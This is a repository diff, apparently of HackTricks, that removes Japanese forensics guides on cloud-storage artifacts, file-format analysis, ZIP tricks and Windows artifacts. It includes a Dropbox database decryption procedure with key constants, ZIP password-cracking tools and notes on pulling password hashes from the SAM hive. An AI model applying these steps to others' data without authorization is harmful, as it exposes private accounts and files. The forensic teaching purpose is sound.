' end check of write access
With oFSO.createTextFile(strPath)
.Write(strBinary)
.Close
End With
End Function
```
{{#include ../../../banners/hacktricks-training.md}}

95
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
View File

@ -1,95 +0,0 @@
# ローカルクラウドストレージ
{{#include ../../../banners/hacktricks-training.md}}
## OneDrive
Windowsでは、OneDriveフォルダーは `\Users\<username>\AppData\Local\Microsoft\OneDrive` にあります。そして、`logs\Personal` 内には、同期されたファイルに関する興味深いデータを含む `SyncDiagnostics.log` ファイルがあります:
- バイト単位のサイズ
- 作成日
- 修正日
- クラウド内のファイル数
- フォルダー内のファイル数
- **CID**: OneDriveユーザーのユニークID
- レポート生成時間
- OSのHDのサイズ
CIDを見つけたら、**このIDを含むファイルを検索することをお勧めします**。_**\<CID>.ini**_ や _**\<CID>.dat**_ という名前のファイルが見つかるかもしれません。これらのファイルには、OneDriveと同期されたファイルの名前などの興味深い情報が含まれている可能性があります。
## Google Drive
Windowsでは、主要なGoogle Driveフォルダーは `\Users\<username>\AppData\Local\Google\Drive\user_default` にあります。このフォルダーには、アカウントのメールアドレス、ファイル名、タイムスタンプ、ファイルのMD5ハッシュなどの情報を含む `Sync_log.log` というファイルがあります。削除されたファイルも、そのログファイルに対応するMD5と共に表示されます。
**`Cloud_graph\Cloud_graph.db`** ファイルはsqliteデータベースで、**`cloud_graph_entry`** テーブルを含んでいます。このテーブルには、**同期された** **ファイル**の**名前**、修正時間、サイズ、ファイルのMD5チェックサムが含まれています。
データベース **`Sync_config.db`** のテーブルデータには、アカウントのメールアドレス、共有フォルダーのパス、Google Driveのバージョンが含まれています。
## Dropbox
Dropboxは**SQLiteデータベース**を使用してファイルを管理しています。この\
データベースは以下のフォルダーにあります:
- `\Users\<username>\AppData\Local\Dropbox`
- `\Users\<username>\AppData\Local\Dropbox\Instance1`
- `\Users\<username>\AppData\Roaming\Dropbox`
主要なデータベースは次のとおりです:
- Sigstore.dbx
- Filecache.dbx
- Deleted.dbx
- Config.dbx
".dbx"拡張子は、**データベース**が**暗号化されている**ことを意味します。Dropboxは**DPAPI**を使用しています([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN>))
Dropboxが使用している暗号化をよりよく理解するには、[https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html)を読むことができます。
しかし、主な情報は次のとおりです:
- **エントロピー**: d114a55212655f74bd772e37e64aee9b
- **ソルト**: 0D638C092E8B82FC452883F95F355B8E
- **アルゴリズム**: PBKDF2
- **反復回数**: 1066
その情報に加えて、データベースを復号化するには、次のものが必要です:
- **暗号化されたDPAPIキー**: レジストリ内の `NTUSER.DAT\Software\Dropbox\ks\client` で見つけることができます(このデータをバイナリとしてエクスポート)
- **`SYSTEM`** および **`SECURITY`** ハイブ
- **DPAPIマスターキー**: `\Users\<username>\AppData\Roaming\Microsoft\Protect` にあります
- Windowsユーザーの**ユーザー名**と**パスワード**
その後、ツール [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**を使用できます:**
![](<../../../images/image (448).png>)
すべてが期待通りに進めば、ツールは**元のものを復元するために使用する必要がある主キー**を示します。元のものを復元するには、この[cyber_chefレシピ](<https://gchq.github.io/CyberChef/index.html#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)>)を使用し、主キーをレシピ内の「パスフレーズ」として入力します。
得られた16進数は、データベースを暗号化するために使用される最終キーであり、次のように復号化できます
```bash
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
```
**`config.dbx`** データベースには以下が含まれています:
- **Email**: ユーザーのメールアドレス
- **usernamedisplayname**: ユーザーの名前
- **dropbox_path**: Dropboxフォルダーがあるパス
- **Host_id: Hash**: クラウドへの認証に使用されます。これはウェブからのみ取り消すことができます。
- **Root_ns**: ユーザー識別子
**`filecache.db`** データベースには、Dropboxと同期されたすべてのファイルとフォルダーに関する情報が含まれています。`File_journal` テーブルが最も有用な情報を持っています:
- **Server_path**: サーバー内のファイルがあるパス(このパスはクライアントの `host_id` によって前置されます)。
- **local_sjid**: ファイルのバージョン
- **local_mtime**: 修正日
- **local_ctime**: 作成日
このデータベース内の他のテーブルには、さらに興味深い情報が含まれています:
- **block_cache**: Dropboxのすべてのファイルとフォルダーのハッシュ
- **block_ref**: `block_cache` テーブルのハッシュIDと `file_journal` テーブルのファイルIDを関連付けます
- **mount_table**: Dropboxの共有フォルダー
- **deleted_fields**: Dropboxで削除されたファイル
- **date_added**
{{#include ../../../banners/hacktricks-training.md}}

18
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
View File

@ -1,18 +0,0 @@
# Office file analysis
{{#include ../../../banners/hacktricks-training.md}}
さらなる情報は[https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)を確認してください。これは要約です:
Microsoftは多くのオフィス文書フォーマットを作成しており、主に**OLEフォーマット**RTF、DOC、XLS、PPTなどと**Office Open XML (OOXML)フォーマット**DOCX、XLSX、PPTXなどの2種類があります。これらのフォーマットにはマクロが含まれることがあり、フィッシングやマルウェアの標的となります。OOXMLファイルはzipコンテナとして構造化されており、解凍することでファイルとフォルダの階層やXMLファイルの内容を確認できます。
OOXMLファイル構造を探るための文書を解凍するコマンドと出力構造が示されています。これらのファイルにデータを隠す技術が文書化されており、CTFチャレンジ内でのデータ隠蔽の革新が続いていることを示しています。
分析のために、**oletools**と**OfficeDissector**はOLEおよびOOXML文書を調査するための包括的なツールセットを提供します。これらのツールは、しばしばマルウェア配信のベクターとして機能する埋め込まれたマクロを特定し分析するのに役立ちます。VBAマクロの分析は、Libre Officeを利用することでMicrosoft Officeなしで行うことができ、ブレークポイントやウォッチ変数を使ってデバッグが可能です。
**oletools**のインストールと使用は簡単で、pipを介してインストールし、文書からマクロを抽出するためのコマンドが提供されています。マクロの自動実行は、`AutoOpen``AutoExec`、または`Document_Open`のような関数によってトリガーされます。
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
{{#include ../../../banners/hacktricks-training.md}}

20
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
View File

@ -1,20 +0,0 @@
# PDFファイル分析
{{#include ../../../banners/hacktricks-training.md}}
**詳細については、次を確認してください:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
PDFフォーマットは、その複雑さとデータを隠す可能性で知られており、CTFフォレンジックチャレンジの焦点となっています。これは、圧縮または暗号化される可能性のあるバイナリオブジェクトとプレーンテキスト要素を組み合わせており、JavaScriptやFlashなどの言語でのスクリプトを含むことがあります。PDFの構造を理解するには、Didier Stevensの[入門資料](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/)を参照するか、テキストエディタやOrigamiのようなPDF専用エディタを使用できます。
PDFの詳細な探索や操作には、[qpdf](https://github.com/qpdf/qpdf)や[Origami](https://github.com/mobmewireless/origami-pdf)のようなツールが利用可能です。PDF内の隠されたデータは以下に隠されている可能性があります
- 見えないレイヤー
- AdobeによるXMPメタデータ形式
- 増分生成
- 背景と同じ色のテキスト
- 画像の背後にあるテキストや重なり合った画像
- 表示されていないコメント
カスタムPDF分析には、[PeepDF](https://github.com/jesparza/peepdf)のようなPythonライブラリを使用して、特注のパーススクリプトを作成できます。さらに、PDFの隠されたデータストレージの可能性は非常に広範であり、NSAのPDFリスクと対策に関するガイドのようなリソースは、もはや元の場所にホストされていないものの、貴重な洞察を提供します。[ガイドのコピー](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%Bútmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf)や、Ange Albertiniによる[PDFフォーマットのトリック](https://github.com/corkami/docs/blob/master/PDF/PDF.md)のコレクションは、このテーマに関するさらなる読み物を提供します。
{{#include ../../../banners/hacktricks-training.md}}

9
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
View File

@ -1,9 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
**PNGファイル**は、その**ロスレス圧縮**の特性から**CTFチャレンジ**で高く評価されており、隠れたデータを埋め込むのに理想的です。**Wireshark**のようなツールは、ネットワークパケット内のデータを解析することでPNGファイルを分析し、埋め込まれた情報や異常を明らかにします。
PNGファイルの整合性をチェックし、破損を修復するために、**pngcheck**は重要なツールであり、PNGファイルを検証し診断するためのコマンドライン機能を提供します ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。ファイルが単純な修正を超えている場合、[OfficeRecoveryのPixRecovery](https://online.officerecovery.com/pixrecovery/)のようなオンラインサービスは、**破損したPNGの修復**のためのウェブベースのソリューションを提供し、CTF参加者のための重要なデータの回復を支援します。
これらの戦略は、CTFにおける包括的なアプローチの重要性を強調しており、隠れたデータや失われたデータを発見し回復するために、分析ツールと修復技術の組み合わせを活用しています。
{{#include ../../../banners/hacktricks-training.md}}

17
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
View File

@ -1,17 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
**音声および動画ファイルの操作**は、**CTFフォレンジックチャレンジ**の定番であり、**ステガノグラフィー**やメタデータ分析を利用して秘密のメッセージを隠したり明らかにしたりします。**[mediainfo](https://mediaarea.net/en/MediaInfo)**や**`exiftool`**などのツールは、ファイルのメタデータを検査し、コンテンツタイプを特定するために不可欠です。
音声チャレンジでは、**[Audacity](http://www.audacityteam.org/)**が波形を表示し、音声にエンコードされたテキストを明らかにするために必要なスペクトログラムを分析するための主要なツールとして際立っています。**[Sonic Visualiser](http://www.sonicvisualiser.org/)**は、詳細なスペクトログラム分析に強く推奨されます。**Audacity**は、隠されたメッセージを検出するためにトラックを遅くしたり逆再生したりする音声操作を可能にします。**[Sox](http://sox.sourceforge.net/)**は、音声ファイルの変換と編集に優れたコマンドラインユーティリティです。
**最下位ビットLSB**の操作は、音声および動画のステガノグラフィーで一般的な技術であり、メディアファイルの固定サイズのチャンクを利用してデータを目立たないように埋め込むことができます。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**は、**DTMFトーン**や**モールス信号**として隠されたメッセージをデコードするのに役立ちます。
動画チャレンジは、音声と動画ストリームをバンドルするコンテナフォーマットを含むことがよくあります。**[FFmpeg](http://ffmpeg.org/)**は、これらのフォーマットを分析および操作するための定番であり、コンテンツのデマルチプレクシングや再生が可能です。開発者向けには、**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**がFFmpegの機能をPythonに統合し、高度なスクリプト可能なインタラクションを提供します。
これらのツールの配列は、CTFチャレンジで必要とされる多様性を強調しており、参加者は音声および動画ファイル内の隠されたデータを明らかにするために幅広い分析および操作技術を駆使しなければなりません。
## 参考文献
- [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
{{#include ../../../banners/hacktricks-training.md}}

21
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
View File

@ -1,21 +0,0 @@
# ZIPs tricks
{{#include ../../../banners/hacktricks-training.md}}
**コマンドラインツール**は**zipファイル**の管理に不可欠で、診断、修復、及びzipファイルのクラッキングに役立ちます。以下は主なユーティリティです
- **`unzip`**: zipファイルが解凍できない理由を明らかにします。
- **`zipdetails -v`**: zipファイルフォーマットフィールドの詳細な分析を提供します。
- **`zipinfo`**: zipファイルの内容を抽出せずにリストします。
- **`zip -F input.zip --out output.zip`** および **`zip -FF input.zip --out output.zip`**: 壊れたzipファイルの修復を試みます。
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: zipパスワードのブルートフォースクラッキングツールで、約7文字までのパスワードに効果的です。
[Zipファイルフォーマット仕様](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)は、zipファイルの構造と標準に関する包括的な詳細を提供します。
パスワード保護されたzipファイルは**ファイル名やファイルサイズを暗号化しない**ことに注意することが重要です。これは、RARや7zファイルがこの情報を暗号化するのとは異なるセキュリティの欠陥です。さらに、古いZipCrypto方式で暗号化されたzipファイルは、圧縮ファイルの未暗号化コピーが利用可能な場合、**平文攻撃**に対して脆弱です。この攻撃は、既知の内容を利用してzipのパスワードをクラッキングします。この脆弱性は[HackThisの記事](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)で詳述され、[この学術論文](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf)でさらに説明されています。しかし、**AES-256**暗号化で保護されたzipファイルはこの平文攻撃に対して免疫があり、機密データのために安全な暗号化方法を選択する重要性を示しています。
## References
- [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
{{#include ../../../banners/hacktricks-training.md}}

495
src/forensics/basic-forensic-methodology/windows-forensics/README.md
View File

@ -1,495 +0,0 @@
# Windows Artifacts
## Windows Artifacts
{{#include ../../../banners/hacktricks-training.md}}
## Generic Windows Artifacts
### Windows 10 Notifications
パス `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` には、データベース `appdb.dat`Windows アニバーサリー前)または `wpndatabase.db`Windows アニバーサリー後)があります。
この SQLite データベース内には、興味深いデータを含む可能性のあるすべての通知XML 形式)の `Notification` テーブルがあります。
### Timeline
Timeline は、訪問したウェブページ、編集した文書、および実行したアプリケーションの **時系列履歴** を提供する Windows の機能です。
データベースは、パス `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` にあります。このデータベースは、SQLite ツールまたはツール [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) を使用して開くことができ、**2 つのファイルを生成し、ツール** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **で開くことができます**
### ADS (Alternate Data Streams)
ダウンロードされたファイルには、**ADS Zone.Identifier** が含まれており、**どのように** intranet、internet などから **ダウンロードされたか** を示しています。一部のソフトウェア(ブラウザなど)は、ファイルがダウンロードされた **URL** など、さらに **多くの情報** を提供することがよくあります。
## **File Backups**
### Recycle Bin
Vista/Win7/Win8/Win10 では、**Recycle Bin** はドライブのルートにあるフォルダー **`$Recycle.bin`** にあります(`C:\$Recycle.bin`)。\
このフォルダー内でファイルが削除されると、2 つの特定のファイルが作成されます:
- `$I{id}`: ファイル情報(削除された日時)
- `$R{id}`: ファイルの内容
![](<../../../images/image (486).png>)
これらのファイルがあれば、ツール [**Rifiuti**](https://github.com/abelcheung/rifiuti2) を使用して、削除されたファイルの元のアドレスと削除された日時を取得できますVista Win10 には `rifiuti-vista.exe` を使用)。
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](<../../../images/image (495) (1) (1) (1).png>)
### ボリュームシャドウコピー
シャドウコピーは、Microsoft Windowsに含まれる技術で、コンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できます。これらは使用中であっても可能です。
これらのバックアップは通常、ファイルシステムのルートから` \System Volume Information`にあり、名前は以下の画像に示されている**UID**で構成されています。
![](<../../../images/image (520).png>)
**ArsenalImageMounter**を使用してフォレンジックイメージをマウントすると、ツール[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html)を使用してシャドウコピーを検査し、シャドウコピーのバックアップから**ファイルを抽出**することができます。
![](<../../../images/image (521).png>)
レジストリエントリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore`には、**バックアップしない**ファイルとキーが含まれています。
![](<../../../images/image (522).png>)
レジストリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`には、`ボリュームシャドウコピー`に関する構成情報も含まれています。
### Office自動保存ファイル
Officeの自動保存ファイルは次の場所にあります: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
## シェルアイテム
シェルアイテムは、別のファイルにアクセスする方法に関する情報を含むアイテムです。
### 最近の文書 (LNK)
Windowsは、ユーザーがファイルを**開く、使用する、または作成する**ときに、これらの**ショートカット**を**自動的に****作成**します:
- Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
- Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
フォルダーが作成されると、フォルダーへのリンク、親フォルダーへのリンク、および祖父フォルダーへのリンクも作成されます。
これらの自動的に作成されたリンクファイルは、**ファイル**か**フォルダー**か、**MAC** **タイム**、ファイルが保存されている**ボリューム情報**、および**ターゲットファイルのフォルダー**に関する情報を**含んでいます**。この情報は、ファイルが削除された場合にそれらを回復するのに役立ちます。
また、リンクファイルの**作成日**は、元のファイルが**最初に**使用された**時間**であり、リンクファイルの**最終更新日**は、元のファイルが使用された**最後の時間**です。
これらのファイルを検査するには、[**LinkParser**](http://4discovery.com/our-tools/)を使用できます。
このツールでは、**2セット**のタイムスタンプが見つかります:
- **最初のセット:**
1. FileModifiedDate
2. FileAccessDate
3. FileCreationDate
- **2番目のセット:**
1. LinkModifiedDate
2. LinkAccessDate
3. LinkCreationDate.
最初のセットのタイムスタンプは**ファイル自体のタイムスタンプ**を参照します。2番目のセットは**リンクされたファイルのタイムスタンプ**を参照します。
同じ情報は、Windows CLIツール[**LECmd.exe**](https://github.com/EricZimmerman/LECmd)を実行することで取得できます。
```
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
```
この場合、情報はCSVファイルに保存されます。
### ジャンプリスト
これは、アプリケーションごとに示される最近のファイルです。各アプリケーションでアクセスできる**アプリケーションによって使用された最近のファイルのリスト**です。これらは**自動的に作成されるか、カスタム**で作成されることがあります。
自動的に作成された**ジャンプリスト**は、`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`に保存されます。ジャンプリストは、最初のIDがアプリケーションのIDである`{id}.autmaticDestinations-ms`という形式で命名されます。
カスタムジャンプリストは、`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`に保存され、通常はファイルに**重要な**ことが起こったためにアプリケーションによって作成されます(お気に入りとしてマークされているかもしれません)。
任意のジャンプリストの**作成時間**は、**ファイルが最初にアクセスされた時間**を示し、**修正時間は最後にアクセスされた時間**を示します。
ジャンプリストは[**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md)を使用して調査できます。
![](<../../../images/image (474).png>)
_JumplistExplorerによって提供されるタイムスタンプは、ジャンプリストファイル自体に関連しています_
### シェルバッグ
[**このリンクをフォローしてシェルバッグについて学んでください。**](interesting-windows-registry-keys.md#shellbags)
## Windows USBの使用
USBデバイスが使用されたことを特定することは、以下の作成によって可能です
- Windows Recent Folder
- Microsoft Office Recent Folder
- ジャンプリスト
一部のLNKファイルは、元のパスを指すのではなく、WPDNSEフォルダーを指しています
![](<../../../images/image (476).png>)
WPDNSEフォルダー内のファイルは元のファイルのコピーであり、PCの再起動では生き残らず、GUIDはシェルバッグから取得されます。
### レジストリ情報
[このページをチェックして](interesting-windows-registry-keys.md#usb-information) USB接続デバイスに関する興味深い情報を含むレジストリキーを学んでください。
### setupapi
USB接続が行われた時刻に関するタイムスタンプを取得するには、`C:\Windows\inf\setupapi.dev.log`ファイルを確認してください(`Section start`を検索)。
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USBディテクティブ
[**USBDetective**](https://usbdetective.com)を使用して、画像に接続されたUSBデバイスに関する情報を取得できます。
![](<../../../images/image (483).png>)
### プラグアンドプレイのクリーンアップ
「プラグアンドプレイのクリーンアップ」として知られるスケジュールされたタスクは、主に古いドライバーバージョンの削除を目的としています。最新のドライバーパッケージバージョンを保持するという指定された目的とは対照的に、オンラインソースは、30日間非アクティブなドライバーも対象にしていることを示唆しています。したがって、過去30日間接続されていないリムーバブルデバイスのドライバーは削除される可能性があります。
タスクは次のパスにあります:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`
タスクの内容を示すスクリーンショットは次のとおりです:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
**タスクの主要コンポーネントと設定:**
- **pnpclean.dll**このDLLは実際のクリーンアッププロセスを担当します。
- **UseUnifiedSchedulingEngine**`TRUE`に設定されており、一般的なタスクスケジューリングエンジンの使用を示します。
- **MaintenanceSettings**
- **Period ('P1M')**:タスクスケジューラに、定期的な自動メンテナンス中に毎月クリーンアップタスクを開始するよう指示します。
- **Deadline ('P2M')**タスクスケジューラに、タスクが2か月連続して失敗した場合、緊急自動メンテナンス中にタスクを実行するよう指示します。
この構成により、ドライバーの定期的なメンテナンスとクリーンアップが確保され、連続して失敗した場合のタスクの再試行が可能になります。
**詳細については、次を確認してください:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
## メール
メールには**2つの興味深い部分がありますメールのヘッダーと内容**。**ヘッダー**には次のような情報が含まれています:
- **誰が**メールを送信したかメールアドレス、IP、メールサーバーがリダイレクトしたメール
- **いつ**メールが送信されたか
また、`References`および`In-Reply-To`ヘッダー内にはメッセージのIDが含まれています
![](<../../../images/image (484).png>)
### Windowsメールアプリ
このアプリケーションは、メールをHTMLまたはテキストで保存します。メールは、`\Users\<username>\AppData\Local\Comms\Unistore\data\3\`内のサブフォルダーにあります。メールは`.dat`拡張子で保存されます。
メールの**メタデータ**と**連絡先**は、**EDBデータベース**内にあります:`\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
ファイルの拡張子を`.vol`から`.edb`に変更すると、[ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html)ツールを使用して開くことができます。`Message`テーブル内でメールを見ることができます。
### Microsoft Outlook
ExchangeサーバーまたはOutlookクライアントが使用されると、いくつかのMAPIヘッダーが存在します
- `Mapi-Client-Submit-Time`:メールが送信されたときのシステムの時間
- `Mapi-Conversation-Index`:スレッドの子メッセージの数と各メッセージのタイムスタンプ
- `Mapi-Entry-ID`:メッセージ識別子。
- `Mappi-Message-Flags`および`Pr_last_Verb-Executed`MAPIクライアントに関する情報メッセージは読まれたか未読か応答されたかリダイレクトされたか不在か
Microsoft Outlookクライアントでは、送信/受信されたすべてのメッセージ、連絡先データ、およびカレンダーデータは、次の場所にあるPSTファイルに保存されます
- `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`WinXP
- `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
レジストリパス`HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook`は、使用されているファイルを示しています。
PSTファイルは、[**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html)ツールを使用して開くことができます。
![](<../../../images/image (485).png>)
### Microsoft Outlook OSTファイル
**OSTファイル**は、Microsoft Outlookが**IMAP**または**Exchange**サーバーで構成されているときに生成され、PSTファイルと同様の情報を保存します。このファイルはサーバーと同期され、**過去12か月間**のデータを保持し、**最大サイズは50GB**で、PSTファイルと同じディレクトリにあります。OSTファイルを表示するには、[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)を利用できます。
### 添付ファイルの取得
失われた添付ファイルは、次の場所から回復できるかもしれません:
- **IE10**の場合:`%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- **IE11以降**の場合:`%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
### Thunderbird MBOXファイル
**Thunderbird**は、データを保存するために**MBOXファイル**を使用し、`Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`にあります。
### 画像サムネイル
- **Windows XPおよび8-8.1**:サムネイルを含むフォルダーにアクセスすると、削除後も画像プレビューを保存する`thumbs.db`ファイルが生成されます。
- **Windows 7/10**UNCパスを介してネットワーク上でアクセスすると`thumbs.db`が作成されます。
- **Windows Vista以降**:サムネイルプレビューは`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`に集中管理され、**thumbcache_xxx.db**という名前のファイルが作成されます。[**Thumbsviewer**](https://thumbsviewer.github.io)および[**ThumbCache Viewer**](https://thumbcacheviewer.github.io)は、これらのファイルを表示するためのツールです。
### Windowsレジストリ情報
Windowsレジストリは、広範なシステムおよびユーザー活動データを保存し、次のファイルに含まれています
- `%windir%\System32\Config`は、さまざまな`HKEY_LOCAL_MACHINE`サブキー用です。
- `%UserProfile%{User}\NTUSER.DAT`は、`HKEY_CURRENT_USER`用です。
- Windows Vista以降のバージョンでは、`HKEY_LOCAL_MACHINE`レジストリファイルが`%Windir%\System32\Config\RegBack\`にバックアップされます。
- さらに、プログラム実行情報は、Windows VistaおよびWindows 2008 Server以降の`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`に保存されます。
### ツール
レジストリファイルを分析するために役立つツールがいくつかあります:
- **レジストリエディタ**Windowsにインストールされています。現在のセッションのWindowsレジストリをナビゲートするためのGUIです。
- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md)レジストリファイルをロードし、GUIでナビゲートすることができます。また、興味深い情報を持つキーをハイライトするブックマークも含まれています。
- [**RegRipper**](https://github.com/keydet89/RegRipper3.0)再び、ロードされたレジストリをナビゲートできるGUIを持ち、ロードされたレジストリ内の興味深い情報をハイライトするプラグインも含まれています。
- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html)レジストリから重要な情報を抽出できる別のGUIアプリケーションです。
### 削除された要素の回復
キーが削除されると、そのようにマークされますが、占有しているスペースが必要になるまで削除されません。したがって、**Registry Explorer**のようなツールを使用すると、これらの削除されたキーを回復することが可能です。
### 最終書き込み時間
各キー-値には、最後に変更された時間を示す**タイムスタンプ**が含まれています。
### SAM
ファイル/ハイブ**SAM**には、システムの**ユーザー、グループ、およびユーザーパスワード**のハッシュが含まれています。
`SAM\Domains\Account\Users`で、ユーザー名、RID、最終ログイン、最終失敗ログオン、ログインカウンター、パスワードポリシー、およびアカウントが作成された時期を取得できます。**ハッシュ**を取得するには、ファイル/ハイブ**SYSTEM**も**必要**です。
### Windowsレジストリの興味深いエントリ
{{#ref}}
interesting-windows-registry-keys.md
{{#endref}}
## 実行されたプログラム
### 基本的なWindowsプロセス
[この投稿](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d)では、疑わしい動作を検出するための一般的なWindowsプロセスについて学ぶことができます。
### Windows Recent APPs
レジストリ`NTUSER.DAT`内のパス`Software\Microsoft\Current Version\Search\RecentApps`には、**実行されたアプリケーション**、**最後に実行された時間**、および**起動された回数**に関する情報を含むサブキーがあります。
### BAMバックグラウンドアクティビティモデレーター
レジストリエディタで`SYSTEM`ファイルを開き、パス`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`内で、**各ユーザーによって実行されたアプリケーション**に関する情報(パス内の`{SID}`に注意)と**実行された時間**を見つけることができます(時間はレジストリのデータ値内にあります)。
### Windowsプリフェッチ
プリフェッチは、コンピュータがユーザーが**近い将来にアクセスする可能性のあるコンテンツを表示するために必要なリソースを静かに取得する**ことを可能にする技術です。これにより、リソースに迅速にアクセスできるようになります。
Windowsプリフェッチは、**実行されたプログラムのキャッシュを作成**して、より迅速にロードできるようにします。これらのキャッシュは、`C:\Windows\Prefetch`内に`.pf`ファイルとして作成されます。XP/VISTA/WIN7では128ファイル、Win8/Win10では1024ファイルの制限があります。
ファイル名は`{program_name}-{hash}.pf`という形式で作成されますハッシュは実行可能ファイルのパスと引数に基づいています。W10では、これらのファイルは圧縮されています。ファイルの存在は、**プログラムが実行された**ことを示しています。
ファイル`C:\Windows\Prefetch\Layout.ini`には、**プリフェッチされたファイルのフォルダーの名前**が含まれています。このファイルには、**実行回数**、**実行日**、および**プログラムによって**開かれた**ファイルに関する情報が含まれています。
これらのファイルを調査するには、[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)ツールを使用できます。
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
![](<../../../images/image (487).png>)
### Superprefetch
**Superprefetch**は、次に読み込まれるものを予測することによって**プログラムをより速く読み込む**という同じ目的を持っています。しかし、これはプレフェッチサービスの代わりにはなりません。\
このサービスは、`C:\Windows\Prefetch\Ag*.db`にデータベースファイルを生成します。
これらのデータベースには、**プログラム**の**名前**、**実行回数**、**開かれたファイル**、**アクセスされたボリューム**、**完全なパス**、**時間枠**、および**タイムスタンプ**が含まれています。
この情報には、ツール[**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/)を使用してアクセスできます。
### SRUM
**System Resource Usage Monitor** (SRUM)は、**プロセスによって消費されるリソース**を**監視**します。これはW8で登場し、`C:\Windows\System32\sru\SRUDB.dat`にESEデータベースとしてデータを保存します。
以下の情報を提供します:
- AppIDとパス
- プロセスを実行したユーザー
- 送信バイト
- 受信バイト
- ネットワークインターフェース
- 接続の持続時間
- プロセスの持続時間
この情報は60分ごとに更新されます。
このファイルから日付を取得するには、ツール[**srum_dump**](https://github.com/MarkBaggett/srum-dump)を使用できます。
```bash
